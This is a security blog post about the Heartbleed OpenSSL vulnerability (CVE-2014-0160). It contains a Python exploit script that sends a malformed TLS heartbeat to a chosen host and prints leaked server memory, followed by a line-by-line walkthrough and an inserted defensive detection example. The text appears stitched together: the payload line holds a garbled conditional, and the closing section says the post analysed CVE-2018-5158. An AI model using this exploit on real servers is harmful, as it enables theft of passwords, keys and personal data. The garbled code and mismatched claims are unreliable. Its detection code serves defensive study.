
by P4rkJW

HeartBleed Vulnerability
[CVE-2014-0160]


Heartbleed is a vulnerability in the OpenSSL cryptography library, tracked as CVE-2014-0160 and publicly disclosed in April 2014.

The Heartbleed vulnerability is a serious security flaw that was discovered in 2014. It affects OpenSSL, the encryption library used to secure communications on the web. Although a fix has long been available, unpatched systems remain in the wild and are still exposed to attack.

What is Heartbleed?

Heartbleed is a security vulnerability that allows an attacker to read the private memory of a process that uses a vulnerable OpenSSL library, up to 64k at a time. That memory can contain sensitive information such as passwords, credit card numbers, session keys, and other personal data.

How Does it Work?

An attacker sends crafted TLS heartbeat requests to a target server and receives server memory in the replies. The vulnerability gets its name from this process, as the server essentially "bleeds" information with every heartbeat.

How Can You Protect Yourself?

It's important to keep your systems up to date with the latest security patches. If you're unsure whether a system is vulnerable, you can use online tools to check it for Heartbleed. Additionally, it's always a good idea to use strong passwords and enable two-factor authentication wherever possible.

Details

HeartBleed Exploit Code Example:
import socket, sys, time
from binascii import hexlify

def heartbleed(addr):
    s = socket.socket()
    try:
        s.connect((addr, 443))
    except OSError:
        print("[-] Connection failed")
        return

    payload = b"\x18\x03\x02\x00\x03\x02\x01" [0:6] + bytes.fromhex("4000") if False else b"\x18\x03\x02\x00\x03\x01" + bytes.fromhex("4000") # The payload that triggers the Heartbleed bug
    s.send(payload)
    data = s.recv(0x4000)
    if not data:
        print("[-] No response received")
        return
    # A valid reply starts with the same 3-byte record prefix and carries a 2-byte length
    if len(data) <= 5 or data[0:3] != b"\x18\x03\x02":
        print("[-] Invalid response received")
        return

    # Extract the leaked data
    length = int.from_bytes(data[3:5], byteorder="big")
    if len(data) != 5 + length:
        print("[-] Invalid response received")
        return
    print(f"[+] Received {length} bytes of leaked data: {hexlify(data[5:])}")
    s.close()

if len(sys.argv) != 2:
    print(f"Usage: {sys.argv[0]} <host>")
    sys.exit(1)
heartbleed(sys.argv[1])

Now let's check the code one by one.

import socket, sys, time
from binascii import hexlify

These lines import the modules the script needs. socket provides socket programming, sys gives access to system-specific parameters and functions (here, the command-line arguments), time provides time-related functions, and hexlify converts binary data to its hexadecimal representation. Note that time is imported but never used by this script.

def heartbleed(addr):
    s = socket.socket()
    try:
        s.connect((addr, 443))
    except OSError:
        print("[-] Connection failed")
        return

This code snippet defines a function named heartbleed that takes an IP address or domain name as an argument. It creates a socket object s and uses it to connect to the target server on port 443. If the connection fails, the exception is caught, an error message is printed, and the function returns. In a larger program it would be better to let the exception propagate (or re-raise it) rather than print and return, so that the caller can handle the failure and problems are easier to diagnose.

payload = b"\x18\x03\x02\x00\x03\x01" + bytes.fromhex("4000") # The payload that triggers the Heartbleed bug
s.send(payload)
data = s.recv(0x4000)

In this code snippet, the payload variable is a bytes object that concatenates a TLS record header (content type 0x18 for heartbeat, version 0x0302, record length 0x0003) with the heartbeat request type 0x01 and a claimed payload length. That claimed length is given by the hex string "4000", which represents 16,384 bytes. The bytes.fromhex() method converts this hex string into the two bytes that carry the length. The mismatch between the claimed length and the record's actual 3-byte body is the Heartbleed bug trigger. The request is sent with s.send(), and s.recv(0x4000) reads the reply.

    if not data:
        print("[-] No response received")
        return

This if statement checks whether the data variable is empty. If the server does not send a response to the client's request, data will be empty, the condition will evaluate to true, and the function returns.

    if len(data) <= 5 or data[0:3] != b"\x18\x03\x02":
        print("[-] Invalid response received")
        return

The if statement shown validates the response received from the server. Specifically, it checks two conditions:

1. Whether the length of data is less than or equal to 5 bytes
2. Whether the first three bytes of data are not equal to the hexadecimal values 0x18 0x03 0x02

If either condition is true, an error message is printed and the function returns.

    length = int.from_bytes(data[3:5], byteorder="big")
    if len(data) != 5 + length:
        print("[-] Invalid response received")
        return

In this code snippet, we extract the length of the leaked data from the fourth and fifth bytes of the data variable using slicing (i.e., data[3:5]). We then convert these two bytes into an integer with the int.from_bytes() method. Since TLS uses network byte order, we set the byteorder parameter to "big". After obtaining the length, we check that it matches the actual amount of data received. The expected total is 5 bytes for the TLS record header (content type, version, and length) plus the length of the leaked data. If there is a mismatch between these lengths, an error message is printed and the function returns.

    print(f"[+] Received {length} bytes of leaked data: {hexlify(data[5:])}")
    s.close()
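The length parsing just described is also exactly what the defensive side of Heartbleed comes down to: the fix in OpenSSL 1.0.1g rejects any heartbeat whose claimed payload length does not fit inside the record, and a network sensor can apply the same test to flag the malformed requests described in "How Does it Work?". As an added example (not part of the original post), the following Python parses the 5-byte TLS record header, then applies that bounds check to the heartbeat body. The sample records, including one built from the payload bytes above, are constructed here; the function names and the PAD_LEN constant are this example's own.

```python
# Added example: detect malformed TLS heartbeat records using the bounds
# check introduced by the OpenSSL 1.0.1g fix (constructed samples, not real traffic).
import struct

TLS_HEARTBEAT = 0x18   # TLS record content type for heartbeat messages
HB_REQUEST = 0x01      # heartbeat message type: request
HB_RESPONSE = 0x02     # heartbeat message type: response
PAD_LEN = 16           # minimum padding required by RFC 6520


def parse_tls_record(data: bytes):
    """Split one TLS record into (content_type, (major, minor), body).
    Raises ValueError when the header is truncated or the length field lies."""
    if len(data) < 5:
        raise ValueError("truncated record header")
    content_type, major, minor, length = struct.unpack("!BBBH", data[:5])
    body = data[5:5 + length]
    if len(body) != length:
        raise ValueError("record length field does not match data on the wire")
    return content_type, (major, minor), body


def check_heartbeat(body: bytes) -> dict:
    """Apply the RFC 6520 / patched-OpenSSL rule to a heartbeat message:
    type (1) + length (2) + claimed payload + 16 bytes padding must fit in the record."""
    if len(body) < 3:
        return {"ok": False, "reason": "heartbeat too short"}
    hb_type = body[0]
    claimed = struct.unpack("!H", body[1:3])[0]
    actual = len(body) - 3
    # This is the check that was missing before OpenSSL 1.0.1g: without it the
    # responder copies `claimed` bytes from memory even though only `actual` arrived.
    if 1 + 2 + claimed + PAD_LEN > len(body):
        return {"ok": False, "reason": "claimed payload length exceeds record",
                "type": hb_type, "claimed": claimed, "actual": actual}
    return {"ok": True, "type": hb_type, "claimed": claimed, "actual": actual}


def inspect(data: bytes) -> dict:
    """Classify one TLS record: non-heartbeat records pass, heartbeats are bounds-checked."""
    try:
        content_type, _version, body = parse_tls_record(data)
    except ValueError as exc:
        return {"ok": False, "reason": str(exc)}
    if content_type != TLS_HEARTBEAT:
        return {"ok": True, "reason": "not a heartbeat record"}
    return check_heartbeat(body)


# Constructed sample 1: the record from the script above, claiming 0x4000 bytes
# while carrying no payload at all.
MALFORMED = bytes.fromhex("18 03 02 00 03 01 40 00")

# Constructed sample 2: a well-formed heartbeat request carrying a 4-byte
# payload "ping" followed by the mandatory 16 bytes of padding.
_hb_body = b"\x01" + struct.pack("!H", 4) + b"ping" + b"\x00" * PAD_LEN
WELLFORMED = b"\x18\x03\x02" + struct.pack("!H", len(_hb_body)) + _hb_body

# Constructed sample 3: a record whose header promises more bytes than were sent.
TRUNCATED = bytes.fromhex("18 03 02 00 10 01")

if __name__ == "__main__":
    for name, record in (("MALFORMED", MALFORMED), ("WELLFORMED", WELLFORMED), ("TRUNCATED", TRUNCATED)):
        print(name, inspect(record))
```

Run as a script it prints a verdict for each sample; the malformed record is reported with claimed=16384 and actual=0, which is the signature a detection rule keys on. Because the check only needs the record header and the first three bytes of the heartbeat, it can be applied to captured packets without decrypting anything, but note that after the TLS handshake heartbeat bodies are encrypted, so the claimed length is only visible in the clear for heartbeats sent before the handshake completes, as in the script above.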

If the validation checks pass, we can assume that the data received from the server is well-formed. We then print a message indicating how many bytes of leaked data were received and display them in hexadecimal using the hexlify() function. Finally, we close the socket with close() so that no further communication with the server takes place.

Conclusion

The Heartbleed vulnerability may have been discovered in 2014, but it's still a threat today. It's important for individuals and organizations alike to take steps to protect themselves against this security flaw.

We analyzed CVE-2018-5158 today. In fact, when analyzing a CVE for the first time, it was difficult because there was not much related material, but I was proud that few people had analyzed this CVE. In the future, we will analyze not only web vulnerabilities but also vulnerabilities combined with the web.

This has been P4rkJW. Thank you.